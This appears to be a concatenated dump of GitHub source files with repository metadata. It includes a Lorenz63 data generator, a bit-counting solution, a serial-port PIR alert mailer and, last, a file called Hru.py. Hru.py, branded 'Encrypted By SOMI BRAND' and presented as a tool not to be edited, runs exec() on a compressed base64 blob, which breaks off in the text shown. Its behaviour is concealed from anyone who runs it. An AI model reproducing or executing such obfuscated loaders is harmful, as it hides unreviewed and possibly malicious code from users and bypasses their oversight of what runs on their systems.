        measures_system_error_list = (np.array(self.states_list)[:, 0]).reshape(-1) # with system error but no measurement error
        measures_list = (np.array(self.measures_list)).reshape(-1)
        colors = ['b', 'r', 'y']
        for value, color in zip([measures_clean_list, measures_system_error_list, measures_list], colors):
            plt.plot([i for i in range(self.epoch)], value, color)
        plt.xlabel('step')
        plt.ylabel('x (measurement)')
        plt.title('measures of Lorenz63')
        plt.legend(['without noise', 'with system noise', 'with system and measurement noise'])
        # plt.show()
        plt.savefig(os.path.join(self.figure_dir, 'measurement.jpg'))

    def show_states_from_Euler(self):
        # Save one 3-D trajectory figure each for the noisy and clean states.
        names = ['states', 'states_clean']
        for value, name in zip([np.array(self.states_list),np.array(self.states_clean_list)], names):
            fig = plt.figure(figsize=(12, 6))
            ax = fig.gca(projection='3d')  # get the current axes in 3-D projection mode
            ax.plot(value[:, 0], value[:, 1], value[:, 2], lw=1.0, color='b')  # plot the trajectory
            plt.title('{} of Lorenz system, $x_0$={},$y_0$={},$z_0$={}'.format(
                name, self.initial_states[0], self.initial_states[1], self.initial_states[2]))
            plt.xlabel('x')
            plt.ylabel('y')
            # plt.show()
            plt.savefig(os.path.join(self.figure_dir, 'Lorenz63_{}_.jpg'.format(name)))
            plt.close()

    def show_observation_x(self):
        # Overlay the x-component of noisy (red) and clean (blue) states.
        names = ['states', 'states_clean']
        colors = ['r', 'b']
        for value, name, color in zip([np.array(self.states_list),np.array(self.states_clean_list)], names, colors):
            plt.plot(value[:, 0], lw=1.0, color=color)  # plot the trajectory
        plt.title('{} of Lorenz system, $x_0$={},$y_0$={},$z_0$={}'.format(
            name, self.initial_states[0], self.initial_states[1], self.initial_states[2]))
        plt.xlabel('x')
        plt.ylabel('y')
        # plt.show()
        plt.savefig(os.path.join(self.figure_dir, 'Lorenz63_x.jpg'))
        plt.close()
def main():
    # Driver: either generate a training corpus (many runs with jittered
    # initial conditions, noisy data only) or a single fully-plotted
    # diagnostic run.  Flip ``stage`` below to choose.
    config = Config()
    initial_states = [1., 3., 5.]
    stage = 'train'
    if stage == 'train':
        train_nums = 6000
        for i in tqdm(range(train_nums)):
            print('------------{}---------'.format(i))
            # Jitter the initial condition so every run is distinct
            # (list + ndarray broadcasts to an ndarray).
            config.initial_states = initial_states + np.random.random(3) * 0.1
            generate_Lorenz63_data = Generate_Lorenz63_Data(config)
            generate_Lorenz63_data.initial_config_and_dirs(i)
            generate_Lorenz63_data.GT_noise_from_Euler()
    elif stage == 'test':
        # config.initial_states += np.random.random(3) * 4
        generate_Lorenz63_data = Generate_Lorenz63_Data(config)
        generate_Lorenz63_data.initial_config_and_dirs('test')
        generate_Lorenz63_data.GT_from_odeint()
        generate_Lorenz63_data.GT_from_Euler()
        generate_Lorenz63_data.save_gt(method='Euler')
        generate_Lorenz63_data.save_gt(method='odeint')
        generate_Lorenz63_data.GT_noise_from_Euler()
        generate_Lorenz63_data.show_measures_from_Euler()
        generate_Lorenz63_data.show_states_from_Euler()
        generate_Lorenz63_data.show_observation_x()


if __name__ == '__main__':
    main()
| [
"xinjialimath@gmail.com"
] | xinjialimath@gmail.com |
02eda608de92ae0fed2702fed640218e15708220 | a0a04e207f4ba8d48f449f246c23f1db4f06f3a3 | /010-二进制中1的个数/v3/number_of_1.py | 397d6b1088847cb78700e6cfc178533ff9bfb400 | [
"Apache-2.0"
] | permissive | Jay54520/Learn-Algorithms-With-Python | e9a0fb70630368dea52d2b2307766a3190b0551d | 5fdd3a607ee3828e9b229cac8104fcccf1a2770d | refs/heads/master | 2021-06-06T15:55:34.297862 | 2020-02-03T13:06:48 | 2020-02-03T13:06:48 | 142,644,085 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,877 | py | # -*- coding: utf-8 -*-
import sys
MAXINT = 2 * (sys.maxint + 1)
class Solution:
"""
输入一个整数,输出该数二进制表示中1的个数。其中负数用补码表示。
算法3:
观察二进制的减法:
1100
-0001
------
1011
从右边开始,第一位 0 < 1,向前借一位;第二位为 0,借不出,于是向第三位借一位;第三位大于 0,所以可以结尾,
借了一位给第二位,于是第三位变成 1 - 1 = 0;
第二位借位后变成 10,然后借给第一位,变成了 10 - 1 = 1;第一位借位后变成 10,然后减去 1,变成了 1。
1100 & 1011 = 1000,所以假设 n & (n-1) 会使 n 的最后一个 1 变为 0。所以 n 有多少个 1
就能执行多少次这样的操作,直到变为 0 为止。
证明:如果 n 的最后一位是 1,那么 n - 1 的最后一位是 0,n & (n - 1) 使 n 的最后一个 1 变为 0 了;
如果 n 的第 m 位是 1,那么减一就要像上面那样一直借尾,使得第 m 位变为 0,m 位右边的所有位变为 1,
所以 n & (n-1) 还是会使 n 的最后一个 1 变为 0,因为 m 位和 m 位右边的每两个位中都有一个 0 存在,而位与
中只要有 0 存在那么结果就是 0。
参考原书。
"""
def NumberOf1(self, n):
number_of_1 = 0
if n < 0:
n = self.get_complement(abs(n))
while n:
number_of_1 += 1
n = n & (n - 1)
return number_of_1
def get_complement(self, num):
"""获取当前 Python 的下 num 的 2 的补数"""
if num < 0:
raise ValueError('num 不能小于 0')
# 32 位 Python 是 2 ** 32,64 位 Python 是 2 ** 64
# 参考 https://stackoverflow.com/a/7604981/5238892
return MAXINT - num
| [
"jsm0834@175game.com"
] | jsm0834@175game.com |
49a7d67eecf924882e9f2aa4097d4b1d2d124264 | ec46c70a721f16031a784f54f522656fb43dfc9f | /venv/lib/python3.6/stat.py | 4d858099ad6d6f85e6e7bf6703e84af7a7511e3c | [] | no_license | kardelen-karatas/django-importXML | c6a62942b740697d3647ec0bc1ed9c078e751159 | b169966627bd54b684aaedd5fd6c0d7be551b973 | refs/heads/master | 2022-12-10T00:38:40.578278 | 2020-04-15T10:34:36 | 2020-04-15T10:34:36 | 125,032,574 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 58 | py | /home/kardelen/.pyenv/versions/3.6.3/lib/python3.6/stat.py | [
"kardelen.karatas@gmail.com"
] | kardelen.karatas@gmail.com |
61ce54e0d88b1ecb2bae4d47502a4e78fbd91044 | 125be7674190db4a071e409c914e8f4c2f3b3c61 | /pyserial_test.py | 35e5b525b27d2dbb0655ddd7974c415f69b7de8f | [] | no_license | jcwebster/METR4810 | e25e7d5bf6b94430e0ce8afc9bcc05526c8ecbbf | 1e52b2691a559ad1f5849d9c4e62d2c3a3f359bc | refs/heads/master | 2021-04-02T17:14:50.761643 | 2018-05-25T02:28:14 | 2018-05-25T02:28:14 | 124,732,937 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 863 | py | import time
import serial
import smtplib
# Alert-mail configuration.
TO = 'jebster15@gmail.com'
GMAIL_USER = 'jebster15@gmail.com'
# NOTE(review): never commit a real password -- load credentials from an
# environment variable or a config file excluded from version control.
GMAIL_PASS = 'putyourpasswordhere'
SUBJECT = 'Intrusion!!'
TEXT = 'Your PIR sensor detected movement'

# Serial link to the sensor board (Windows COM port, 9600 baud).
ser = serial.Serial('COM3', 9600)
def send_email():
    # Send the intrusion-alert e-mail through Gmail's SMTP (STARTTLS on 587).
    # NOTE(review): Python 2 module -- the bare ``print header`` below is a
    # Python 2 print statement.
    print("Sending Email")
    smtpserver = smtplib.SMTP("smtp.gmail.com",587)
    smtpserver.ehlo()
    smtpserver.starttls()
    # NOTE(review): missing call parentheses -- this is a bare attribute
    # access and does nothing; presumably ``smtpserver.ehlo()`` was meant.
    smtpserver.ehlo
    smtpserver.login(GMAIL_USER, GMAIL_PASS)
    header = 'To:' + TO + '\n' + 'From: ' + GMAIL_USER
    header = header + '\n' + 'Subject:' + SUBJECT + '\n'
    print header
    msg = header + '\n' + TEXT + ' \n\n'
    smtpserver.sendmail(GMAIL_USER, TO, msg)
    smtpserver.close()
# Poll the serial link twice per second; any line starting with 'M'
# (movement) would trigger the e-mail alert -- the actual send is
# currently commented out in favour of a console message.
while True:
    message = ser.readline()
    print(message)
    if message[0] == 'M' :
        #send_email()
        print('sending email')
    time.sleep(0.5)
| [
"jcwebster@uwaterloo.ca"
] | jcwebster@uwaterloo.ca |
938ee17a4f0f81f2ec099d3c9214514b49800d50 | c9bbb0a3bf44d1deb2025dec50b67d4beeb54e7a | /py3/lexerzoo/common_stuff.py | 6042914788d73c296477d3aa02d162043407cedf | [] | no_license | kykyev/lexers-zoo | 87d3d5ff1ac6c0e9bfd7d32b8f89539a62be6028 | da953232b9eb4986a4ee1e1dacc4377e2b0bb7c7 | refs/heads/master | 2020-06-04T04:20:40.912159 | 2015-05-21T15:03:23 | 2015-05-21T15:03:23 | 5,783,264 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,556 | py | """
"""
from collections import namedtuple
from queue import Queue
# Public API of this module; TokenMetaInfo and Asymbol are internal.
__all__ = [
    'TOK_WORD', 'TOK_NUMBER', 'TOK_EOF',
    'Token',
    'MailBox',
    'Buffer'
]

# token's types
TOK_WORD = 'TOK_WORD'
TOK_NUMBER = 'TOK_NUMBER'
TOK_EOF = 'TOK_EOF'

# type - token's type (one of the TOK_* constants above)
# value - token's value (the matched text)
# meta - token's meta information (a TokenMetaInfo)
Token = namedtuple('Token', 'type value meta')

# lineno - line number
# start - token's start position in line
# end - token's end position
TokenMetaInfo = namedtuple('TokenMetaInfo', 'lineno start end')

# annotated symbol: one input character plus its source position
# symbol - plain symbol
# lineno - line number
# column - column number
Asymbol = namedtuple('Asymbol', 'symbol lineno column')
class MailBox:
    """Thread-safe FIFO channel between lexer stages.

    The ``EOFError`` exception class itself is used as an end-of-stream
    sentinel: ``put(EOFError)`` marks the end, after which ``get``
    raises ``EOFError`` and iteration stops.
    """

    def __init__(self):
        self.box = Queue()

    def put(self, item):
        """Enqueue *item*; enqueue ``EOFError`` to signal end of stream."""
        self.box.put(item)

    def get(self):
        """Dequeue one item, raising ``EOFError`` at end of stream."""
        item = self.box.get()
        if item == EOFError:
            raise EOFError
        return item

    def __iter__(self):
        # Fixed: ``queue.Queue`` is not iterable, so the original
        # ``for item in self.box`` raised TypeError (and its explicit
        # ``raise StopIteration`` inside a generator is a RuntimeError
        # since Python 3.7 / PEP 479).  Drain via blocking ``get`` until
        # the sentinel arrives.
        while True:
            item = self.box.get()
            if item == EOFError:
                return
            yield item
class Buffer:
    """Accumulates annotated symbols (Asymbol) until a token boundary.

    ``token`` condenses the buffered symbols into a single Token whose
    meta information spans from the first to the last buffered column.
    """

    def __init__(self):
        self.asymbols = []

    def push(self, s):
        """Append one annotated symbol to the buffer."""
        self.asymbols.append(s)

    def reset(self):
        """Discard everything accumulated so far."""
        self.asymbols = []

    def token(self, type):
        """Build a Token of the given type from the buffered symbols."""
        buffered = self.asymbols
        value = "".join(entry.symbol for entry in buffered)
        first, last = buffered[0], buffered[-1]
        meta = TokenMetaInfo(first.lineno, first.column, last.column)
        return Token(type, value, meta)

    def __iter__(self):
        return iter(self.asymbols)
"me@eblan.(none)"
] | me@eblan.(none) |
4bd37797e18b615595f99c418a405cd55a3c50c1 | 088e3a9b6efa40d890529a70633663cae82fd20b | /layers.py | 77ec07ed618abad81ae71c1759a7c48c08e83d9c | [] | no_license | etuna/CycleGAN | 98b8d5afa5edc12aa463fa8bf73609babe593b81 | 0f790bb8ca478d7ebc07c1f481ca4bfc53a6882c | refs/heads/master | 2023-02-18T05:47:11.364130 | 2021-01-22T17:17:32 | 2021-01-22T17:17:32 | 330,125,563 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,137 | py | import tensorflow.compat.v1 as tf
import helper as H
helper = H.helper(tf)
def conv(input, reuse=False, name='conv'):
with tf.variable_scope(name, reuse=reuse):
weights = helper.genWeights("weights",shape=[7, 7, input.get_shape()[3], 3])
conv = tf.nn.conv2d(input, weights, strides=[1, 1, 1, 1], padding = 'SAME')
print('first conv '+str(conv.shape))
return tf.nn.tanh(helper.normalize(conv))
def genr(input, k, reuse=False, name=None):
with tf.variable_scope(name, reuse=reuse):
weights = helper.genWeights("weights",shape=[3, 3, input.get_shape()[3], k])
conv = tf.nn.conv2d(input, weights, strides=[1, 2, 2, 1], padding='SAME')
print('conv shape : {}'+ str(conv.shape))
return tf.nn.relu(helper.normalize(conv))
def addResBlocks(input, reuse):
output = res(input, input.get_shape()[3], reuse)
for i in range(1,10):
output = res(output, output.get_shape()[3], reuse)
return output
def res(input, n, reuse=False):
name = 'RESBLOCK{}{}'.format(input.get_shape()[3], 1)
with tf.variable_scope(name, reuse=reuse):
with tf.variable_scope('resLayer', reuse=reuse):
resWeights = helper.genWeights("resWeights", shape=[3, 3, input.get_shape()[3], n])
conv = tf.nn.conv2d(input, resWeights, strides=[1, 1, 1, 1], padding='SAME')
relued = tf.nn.relu(helper.normalize(conv))
with tf.variable_scope('resLayer2', reuse=reuse):
resWeights2 = helper.genWeights("resWeights2",shape=[3, 3, relued.get_shape()[3], n])
return input+helper.normalize(tf.nn.conv2d(relued, resWeights2, strides=[1, 1, 1, 1], padding='SAME'))
def frac(input, k, reuse=False, name=None):
with tf.variable_scope(name, reuse=reuse):
weights = helper.genWeights("weights", shape=[3, 3, k, input.get_shape().as_list()[3]])
outputShape = [input.get_shape().as_list()[0], input.get_shape().as_list()[1]*2, input.get_shape().as_list()[1]*2, k]
deConvConv = tf.nn.conv2d_transpose(input, weights, output_shape=outputShape, strides=[1, 2, 2, 1], padding='SAME')
print('deconv shape : {}'+ str(deConvConv.shape))
return tf.nn.relu(helper.normalize(deConvConv))
def disc(input, k, reuse=False, name=None):
with tf.variable_scope(name, reuse=reuse):
weights = helper.genWeights("weights", shape=[4, 4, input.get_shape()[3], k])
conv = tf.nn.conv2d(input, weights, strides=[1, 2, 2, 1], padding='SAME')
return helper.lRelu(helper.normalize(conv), 0.3)
def disc2(input, k, reuse=False, name=None):
with tf.variable_scope(name, reuse=reuse):
weights = helper.genWeights("weights", shape=[4, 4, input.get_shape()[3], k])
conv = tf.nn.conv2d(input, weights, strides=[1, 2, 2, 1], padding='SAME')
return tf.maximum(tf.contrib.layers.batch_norm(input, decay=0.9,scale=True,updates_collections=None,is_training=True), 0)
def decide(input, reuse=False, name=None):
with tf.variable_scope(name, reuse=reuse):
weights = helper.genWeights("weights", shape=[4, 4, input.get_shape()[3], 1])
conv = tf.nn.conv2d(input, weights, strides=[1, 1, 1, 1], padding='SAME')
biases = helper.genBiases("biases", [1])
return conv + biases | [
"etuna@ku.edu.tr"
] | etuna@ku.edu.tr |
e06edc9ef4206d01ba268cd77e82b51af3988588 | 00f3468d8917ac0c1b4df8b4dc50e82c0d9be3fa | /seqsfromfasta.py | f7aa0be287db92eee1959c13a03c700c3416c9e7 | [] | no_license | berkeleyphylogenomics/BPG_utilities | 4e332bb401b8c057502a1a0a1d532396bfff9542 | bbf5df137a0a459598c3f9073d80f0086e5f7550 | refs/heads/master | 2021-01-01T19:21:13.740575 | 2014-11-05T18:40:31 | 2014-11-05T18:40:31 | 24,867,074 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 572 | py | #!/usr/bin/env python
from Bio import SeqIO
def seqpull(h, *args): #should use 'any' in py > 2.3
return ''.join([seq.format('fasta') for seq in SeqIO.parse(h,'fasta') \
if sum([seq.id.count(arg) for arg in args])])
if __name__ == '__main__':
import sys
if len(sys.argv) < 3:
print "%s: get sequences from a fasta file by substring in defline" \
% sys.argv[0]
print "USAGE: %s <multiple fasta file> [keywords]" % sys.argv[0]
else:
h = open(sys.argv[1])
print seqpull(h,*sys.argv[2:])
h.close()
| [
"afrasiabi@berkeley.edu"
] | afrasiabi@berkeley.edu |
67b8404369a54607817541ec5f3cf111a34e010f | 79ca85694d6e51c1523c019cf93df7910d1bd096 | /src/study_keras/1_hello_mnist/hello_mnist_fashion_1.py | 96a6e62b550a56ddbcd4efd1c12d7597e14c8c79 | [
"MIT"
] | permissive | iascchen/ai_study_notes | 396ed19b140befc9753e442235dedaa4559f0d8b | 03f46c5e37670c10bd99000d979940db8878f36c | refs/heads/master | 2022-08-21T18:25:33.865912 | 2020-06-26T14:22:19 | 2020-06-26T14:22:19 | 200,769,105 | 4 | 1 | MIT | 2022-07-06T20:12:41 | 2019-08-06T03:25:17 | Python | UTF-8 | Python | false | false | 1,300 | py | from tensorflow.keras import datasets, models
from image_utils import visualize_layer_filters
if __name__ == '__main__':
mnist = datasets.fashion_mnist
(x_train, y_train), (x_test, y_test) = mnist.load_data()
img_rows, img_cols = 28, 28
train_images = x_train.reshape(x_train.shape[0], 28, 28, 1)
test_images = x_test.reshape(x_test.shape[0], 28, 28, 1)
x_train, x_test = x_train / 255.0, x_test / 255.0
class_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat', 'Sandal', 'Shirt', 'Sneaker', 'Bag',
'Ankle boot']
#######################
# load model
#######################
base_path = "../../../output"
h5_path = "%s/hello_mnist_fashion.h5" % base_path
loaded_model = models.load_model(h5_path)
loaded_model.summary()
# loaded_model.evaluate(test_images, y_test)
#######################
# draw Convolutional Filter
#######################
# TODO: Error. Fused conv implementation does not support grouped convolutions for now.
convLayers = [layer.name for layer in loaded_model.layers if (layer.__class__.__name__ == 'Conv2D')]
print(convLayers)
for i in range(len(convLayers)):
visualize_layer_filters(model=loaded_model, layer_name=convLayers[i], epochs=40)
| [
"chenhao@microduino.cc"
] | chenhao@microduino.cc |
81b262225ee0e402d629bfa32004c14047740aab | a69da8a9caf3472758ef4ea001067e59790eddea | /env/Scripts/django-admin.py | 51c8cd8fac51aefb3ba0338e2542416b53d0a5b8 | [] | no_license | KartikTakyar0046/AskMeAnything.com | 9f55596254c26a580f2a64e389d69c6feefa4f8f | 16913330569f9787ff396421d5668a47f003efe7 | refs/heads/master | 2023-07-18T21:33:56.362574 | 2021-09-21T05:31:16 | 2021-09-21T05:31:16 | 329,034,425 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 704 | py | #!c:\users\kartik\desktop\p1\askmeanything.com\env\scripts\python.exe
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
try:
from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
raise ImportError(
'django-admin.py was deprecated in Django 3.1 and removed in Django '
'4.0. Please manually remove this script from your virtual environment '
'and use django-admin instead.'
)
if __name__ == "__main__":
warnings.warn(
'django-admin.py is deprecated in favor of django-admin.',
RemovedInDjango40Warning,
)
management.execute_from_command_line()
| [
"42770126+KartikTakyar0046@users.noreply.github.com"
] | 42770126+KartikTakyar0046@users.noreply.github.com |
c7d586ce958c80402104036345d4636701b137d2 | 5ad6e58f6f7047e7ad1bd177e69faf6aece3f3ef | /ai/population.py | 44360e5d5d8f365bba66d5fada656a9412143750 | [] | no_license | VictorShow/stock | dfb07509c55c642a83b4d95706fd62294fd30268 | 10d09d896256a8fb20d64b8a218d7cf96634b675 | refs/heads/master | 2021-04-10T11:18:11.783189 | 2020-03-21T08:02:03 | 2020-03-21T08:02:03 | 248,931,648 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,527 | py | from ai.util import Storage
from tensorflow import keras, random
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
class Popluation:
population_inc : []
population_old : []
@property
def population_inc(self) -> object: return self._population_inc
@population_inc.setter
def population_inc(self, population_inc): self._population_inc = population_inc
@property
def population_old(self) -> object: return self._population_old
@population_inc.setter
def population_old(self, population_old): self._population_old = population_old
def __init__(self):
self.storage = Storage()
def initialize(self):
self.population_inc = [0.3, -0.78, 1.26, 0.03, 1.11, 15.17, 0.24, -0.24, -0.47, -0.77, -0.37, -0.85, -0.41, -0.27,
0.02, -0.76, 2.66]
self.population_old = [12.27, 14.44, 11.87, 18.75, 17.52, 9.29, 16.37, 19.78, 19.51, 12.65, 14.74, 10.72, 21.94,
12.83, 15.51, 17.14, 14.42]
def population_without_outlier(self):
self.population_inc = self.population_inc[:5] + self.population_inc[6:]
self.population_old = self.population_old[:5] + self.population_old[6:]
def population_with_regression(self):
# 최소제곱법 으로 회귀선 구하기
# 4.3 최소제곱법으로 회귀선 구하기
X = self.population_inc
Y = self.population_old
# X, Y의 평균
x_bar = sum(X) / len(X)
y_bar = sum(Y) / len(Y)
# 최소제곱법으로 a, b를 구합니다.
a = sum([(y - y_bar) * (x - x_bar) for y, x in list(zip(Y, X))])
a /= sum([(x - x_bar) ** 2 for x in X])
b = y_bar - a * x_bar
print('a:', a, 'b:', b)
# 그래프를 그리기 위해 회귀선의 x, y 데이터를 구합니다.
line_x = np.arange(min(X), max(X), 0.01)
line_y = a * line_x + b
return {'line_x': line_x, 'line_y': line_y}
def population_with_regression_using_tf(self):
# tf를 사용해서 회귀선 구하기.
X = instance.population_inc
Y = instance.population_old
a = tf.Variable(random.random())
b = tf.Variable(random.random())
# 잔차의 제곱의 평균을 반환하는 함수
def compute_loss():
y_pred = a * X + b
loss = tf.reduce_mean(Y - y_pred) ** 2 #최소제곱법
return loss
optimizer = tf.keras.optimizers.Adam(lr=0.07)
for i in range(1000):
optimizer.minimize(compute_loss, var_list=[a, b])
if i % 100 == 99:
print(i, 'a:', a.numpy(), 'b:', b.numpy(), 'loss:', compute_loss().numpy())
line_x = np.arange(min(X), max(X), 0.01)
line_y = a * line_x + b
return {'line_x': line_x, 'line_y': line_y}
def normalization(self):
pass
def new_model(self):
X = instance.population_inc
Y = instance.population_old
model = tf.keras.Sequential([
tf.keras.layers.Dense(units=6, activation='tanh', input_shape=(1,)), # 입력값
tf.keras.layers.Dense(units=1) # 결과값
])
model.compile(optimizer=tf.keras.optimizers.SGD(lr=0.1), loss='mse')
# mse : mean squared error
model.fit(X, Y, epochs=10)
model.predict(X)
return model
def predict(self, model):
X = self.population_inc
line_x = np.arange(min(X), max(X), 0.01)
line_y = model.predict(line_x)
return {'line_x': line_x, 'line_y': line_y}
class View:
@staticmethod
def show_population(instance, dic):
X = instance.population_inc
Y = instance.population_old
line_x = dic['line_x']
line_y = dic['line_y']
# 붉은색 실선으로 회귀선을 그립니다.
plt.plot(line_x, line_y, 'r-')
plt.plot(X, Y, 'bo')
plt.xlabel('Population Growth Rate (%)')
plt.ylabel('Elderly Population Rate (%)')
plt.show()
if __name__ == '__main__':
instance = Popluation()
view = View()
instance.initialize()
instance.population_without_outlier()
#dic = instance.population_with_regression()
#dic = instance.population_with_regression_using_tf()
#model = instance.new_model() # 모델로 변경하는 부분을 보여 주기 위해서
dic = instance.predict(instance.new_model())
view.show_population(instance, dic) | [
"kjhk26@gmail.com"
] | kjhk26@gmail.com |
599a63942744bedf485f445f7836915eb939788a | f44e4c541308a5a7d6fce91faa626d9947981a4e | /src/AnemoClinoIHM/AnalyserUsefulClasses/ObjectEventService.py | 1db3c3b05b4ecfff0be56b536aa005258b9c98dd | [] | no_license | ChicLi/anemo | 8258140b021e62596879237c0c2807289e78851e | 5a527ef6dddeb1e733a1c0f87e9c544a5eba8a6e | refs/heads/master | 2020-07-14T11:05:10.030977 | 2016-09-28T02:33:49 | 2016-09-28T02:33:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 999 | py | """
Last updated on 07/01/2015
@author: Cheng WANG,
"""
from PyQt4.QtCore import *
class ObjectEventService(QObject):
def __init__(self, parent):
QObject.__init__(self, parent)
parent.setMouseTracking(True)
parent.installEventFilter(self)
def eventFilter(self, _, event):
if event.type() == QEvent.MouseMove:
self.emit(SIGNAL("MouseMove"), event.pos())
elif event.type() == QEvent.MouseButtonPress:
self.emit(SIGNAL("MouseClicked"), event.pos())
elif event.type() == QEvent.MouseButtonRelease:
self.emit(SIGNAL("MouseReleased"), event.pos())
elif event.type() == QEvent.MouseButtonDblClick:
self.emit(SIGNAL("MouseDoubleClick"), event.pos())
elif event.type() == QEvent.HoverEnter:
self.emit(SIGNAL("MouseHovered"), event.pos())
elif event.type() == QEvent.Leave:
self.emit(SIGNAL("MouseLeaved"))
return False
# eventFilter() | [
"Cheng WANG"
] | Cheng WANG |
ca6fe37978296238fb90e6d193ad9e7a739cfb54 | 804bd568724431ce740aac9994747a0a9a5e3f93 | /Hru.py | 8ef4e43cf4a7e5a2cef52bf887e356aee0f03896 | [] | no_license | SOMii-BRAND/hru | 9a9f1bd054b19cff2eb7f7ae6001352afa9816e0 | cb89fa5233d58a4f53c19c43825535d66617b673 | refs/heads/main | 2022-12-30T06:17:31.280845 | 2020-10-26T11:43:51 | 2020-10-26T11:43:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,063 | py | #Encrypted By SOMI BRAND
#WHATSAPP : +923455453538/DON,T TRY TO EDIT THIS TOOL/
import zlib, base64
exec(zlib.decompress(base64.b64decode("eJzdO2tv28h2n6VfMVGQUKopvmX5Ee+F4tiJu/EDsZO0a3lpShzZjPjQklRsp+4C/dDiAkVxb9rkBii6aD/dH9KfEqDf+xN6ZoaPIUUpSrK7t9ixHsMz5zVnzjkc8YwdbxKEMQoiMbqJxNjxsGhbMaad0PLtwBMvrejSdQZiiMX4MsSW7fgX4qso8MVp6JKBYRCMHUx6FzieWFFUDyIJ2MXYawqhh9rhCEnxdSy06qMgRD5yfAS8L3BTV6C1Nup1BM33BiHaQkyqRL4cP26qrIlonbUWxaUfIEKKYjuYxkAWTLDfFKgYEQkWyKI4k5AwIawTQE4kjdxpdNlMGMbhzQbtOcwiIf5hiqM4quPrIZ7EaI+Cd8IwCBkeN8eDAO0H9tTF6MDysI2eJbR3UHwzwRsTZ6LBnKPYct2MrzBHroeHl5bvvMFfIng/Ja6SnHFORJM1liIX40lTbZU5n1xin/FAk5v4MvA11HNdaXJDDOv8rE6TWkTMpz4KAw95Uzd2JmEwxFEE1NIkCNzUSieU5xFAGG7KQ2JGcwI/SlG3A9/HQwKiNkx4p6JSrIdhcBXhsF6vh9gNLLsJM2vVqbPg2MYjC5TB/jAg82gK03i0Boag/pqxkhIeTTJAyEyA2y42w2AQxFFz13IjPDOGRyEGL8y5mJdxPJGenJwcPWNjR8wEATAWPevaJGbeUikjy7YvwQ44jECR06bwHMS3exfYp0FwOMGhJa9Lawpq9nw7DBx7E1Eg2nd8R9Y1SZE0rWPIax0JPd9Ejt1CRyAyDmRNUjXJ0HT0ApiD7WS4VFeF1lmV2CkRazGxwiPLfe2MZVValUDuU8efXm8S5okGyJAMSdtEB3/T6aCHU8e15W8PTzodZbWFTncf9g7k3YdGbxN6L2RVAR5Ex1VpdQ1AD1/IRmddMdRVBa4e7ct/Z2M/cuKbLV1SxCvHji+3VGVNES+xc3EZb6nrmvL3gPl0W3Zic+8Eus8KLLafyUcBOPx+MHBcDID9XdmKphGR9SjtHR3IQ0hII2uIB+C00tiKLd8iCryQe8fPj83vFKX3CK6PX8gdibA9PJJVwr0nX6+tblihh62B037dtTbPiAXr4E9ojN2pBUu6Ua/RHIUg5Cx/HElCvcbiEHzZicGZKLo1tMbNQYtlgCswu2BdxvabV0OBQmwCYV2SYh2SYq8ZMhtegfE7wsrVaSm9KqILefOq1VZbZysOJQhxPA19NMQxiLRBPlWAXc7XIBN7lYt9BVhXkuPb+LrptDLw9Ra6lkI8ccGiTeHOvUi454hCX9H103vRpuoJ96I4bOrqyqsWI7qm6lMExRMSUJGJIogZQquc6K9CJ8bN6xWh7wvpfF5ZruU33xD7E9UxUf0NWkEEB2C1GXII3QI0vXvUalwiJfczRYLgJCJiZ0zXN3agRyJFkEAvUFSSki8JCWdMfkDkU0QinN21Gv2wf60OTtXNdd07crEVYfTScmKUQxsrQUvcnNVqs5jc6/WBNSQqKPVgTIP2rO7Y7Hs4GbDO66nrB+RW2qCG1FXvAC5fALRBx/IRzWNQ7j7fGIJ+YaNVZ86MGg0Yptigp+p9/NPbj3/6ffn1/kMFvARMLt/OAJNOJkTzUti7j+//yL1+KsNLPObp8v5t1smE6N7H9/++SOP3RV1zHu+KJO8WCDGouUBONofyrOcJeZtrR2b70wIhHa+gEE9UMcMSs0y7nyq1yISseoVp5AvytjzDDF5gzL0yeNrhF/7DH/4Cr3f/AJ8FH1/OwQtOvaTvV3ksh7MgCMqu85nwag+vJuGjpELRP+c+NM+3ykMz0VMIgepYKITRz2KLqvBaWovqOPtzOZ4qg3kBnFfkfaWLveNjZEEglgJuJs6Wg/NDZRF8jHz4p48f/vkv9Vmnd6W70J4GFwH5rtdd6Knk1la8Yf33fy3zh0SJC71l8M1v0LnEusImFzCLaNrnAnfJL
